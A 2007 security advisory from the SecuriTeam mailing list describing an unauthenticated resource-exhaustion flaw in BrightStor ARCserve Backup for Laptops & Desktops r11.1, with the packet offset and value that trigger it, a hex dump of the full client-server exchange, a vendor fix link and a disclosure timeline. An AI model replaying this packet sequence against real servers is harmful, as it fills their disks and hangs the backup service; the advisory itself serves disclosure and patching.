[NT] Unauthenticated Resource Exhaustion Mobile BackupService

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Unauthenticated Resource Exhaustion Mobile BackupService
------------------------------------------------------------------------


SUMMARY

"BrightStor <http://www3.ca.com/solutions/Product.aspx?ID=263> ARCserve
Backup for Laptops & Desktops reduces business risk by providing a fast,
automatic and transparent solution for backing up and restoring data on
remote and mobile Windows-based PCs." A vulnerability in Mobile
BackupService allows the program to write large files to the disk, or
generally cause it to be come unresponsive.

DETAILS

Vulnerable Systems:
* BrightStor ARCserve Backup for Laptops & Desktops version r11.1

By sending a specially crafted series of packets to the LGSERVER.EXE
process that listens on TCP port 2200, it is possible to cause
LGSERVER.EXE to write very large files to the system disk. In addition,
the LGSERVER.EXE process becomes unresponsive until the file has been
written.

Upon every authentication attempt to LGSERVER.EXE a file is created within
D:\CA_BABLDdata\Server\data\transfer. This file has an extension of .USX
which would take the format of something like (where X is equal to 0-9 or
A-F) - RWXXX.usx

During the negotiation, within the third packet at HEX address of (DWORD)
0x15 - 0x18, you will normally see the value 0x00 0x00 0x00 0x00 followed
by CoreDataDB.

When sending this packet the contents are written to this USX file.
However, if we pass a DWORD value of 0xff 0xff 0xff 0x7f at the address
0x15-0x18, we write an additional 2,096,153KB NULLS to the USX file.

Sample Conversation:
Client:- (Packet 1)

Raw Data
4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, )
00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 ( )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Client:- (Packet 2)

Raw Data
4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, )
06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Client:- (Packet 3)

Raw Data
4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, )
ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData)
44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB )
00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J )
00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J )
00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P )
00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( )
00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B )
00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N )
00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b )
00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f )
00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x )
00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | )
00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( )
00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( )
00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ( )
00 00 01 00 00 00 03 00 00 00 f0 b4 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 01 00 00 00 04 00 00 00 06 00 43 6f 6e 66 ( Conf)
69 67 06 00 00 00 05 00 00 00 29 9f 07 00 00 00 (ig ) )
12 92 09 00 00 00 1f 9b 0b 00 00 00 57 92 0d 00 ( W )
00 00 b6 ad 0f 00 00 00 72 9c 00 00 00 00 00 00 ( r )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 03 00 00 00 06 00 00 00 08 00 55 73 65 72 ( User)
4e 61 6d 65 00 00 00 00 00 00 00 00 00 00 00 00 (Name )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 6d 61 72 6b 03 00 00 00 08 00 00 00 ( mark )
08 00 50 61 73 73 77 6f 72 64 00 00 00 00 00 00 ( Password )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 6a 86 fb b5 8d 2b ( j +)
1b a4 40 e1 b6 73 03 00 00 00 0a 00 00 00 0a 00 ( @ s )
55 73 65 72 53 74 61 74 75 73 11 00 00 00 03 00 (UserStatus )
00 00 0c 00 00 00 08 00 43 6f 64 65 50 61 67 65 ( CodePage)
e4 04 00 00 03 00 00 00 0e 00 00 00 04 00 48 6f ( Ho)
73 74 67 73 72 6c 2d 74 65 73 74 2e 67 73 72 6c (stgsrl-test.gsrl)
2d 74 65 73 74 2e 6e 65 74 03 00 00 00 10 00 00 (-test.net )
00 07 00 56 65 72 73 69 6f 6e 31 31 2e 31 2e 37 ( Version11.1.7)
34 32 3a 57 69 6e 64 6f 77 73 20 53 65 72 76 65 (42:Windows Serve)
72 20 32 30 30 33 (r 2003)

Client:- (Packet 4)

Raw Data
4e 3d 2c 1b 00 00 00 00 04 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Server:-

Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )

Fix Information:

<http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp> http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp

Disclosure Timeline:
* Discovered: 19 June 2006
* Released: 19 June 2006
* Approved: 19 June 2006
* Reported: 22 June 2006
* Fixed: 23 January 2007
* Published: 30 January 2007


ADDITIONAL INFORMATION

The information has been provided by <mailto:mark@xxxxxxxxxxx> Mark.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages